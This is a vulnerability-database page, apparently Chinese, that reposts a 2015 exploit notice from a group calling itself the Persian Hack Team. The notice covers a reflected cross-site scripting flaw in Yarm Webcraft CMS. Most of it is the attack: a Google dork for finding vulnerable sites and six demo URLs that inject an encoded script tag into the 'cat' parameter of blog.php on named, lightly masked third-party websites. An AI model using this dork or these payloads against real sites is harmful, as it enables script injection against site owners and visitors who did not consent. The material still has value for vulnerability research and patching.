Yarm Webcraft CMS Cross Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1040696 漏洞类型
发布时间 2015-12-17 更新时间 2015-12-17
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2015120193
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
######################
# Exploit Title :  Yarm Webcraft CMS Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage :  http://www.yarm-webcraft.co.uk/
# Google Dork : "Website by Yarm Webcraft " inurl:blog.php
# Date: 2015/12/17
# Version : All
#
######################
# 
# Demo:
#
#http://www.maeXve-haran.co.uk/blog.php?ac=post&id=2&cat=%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E&p=1
#
#http://www.phXilip-caveney.co.uk/blog.php?ac=post&id=32&cat=%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E&p=1
#
#http://gavin-Xweightman.co.uk/blog.php?ac=post&id=32&cat=%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E&p=1
#
#http://wwwX.thegamingacademy.co.uk/blog.php?ac=post&id=32&cat=%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E&p=1
#
#http://wwXw.clarebeaton.com/blog.php?ac=post&id=32&cat=%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E&p=1
#
#http://mXedisport-training.co.uk/blog.php?ac=post&id=32&cat=%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E&p=1
#
#
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################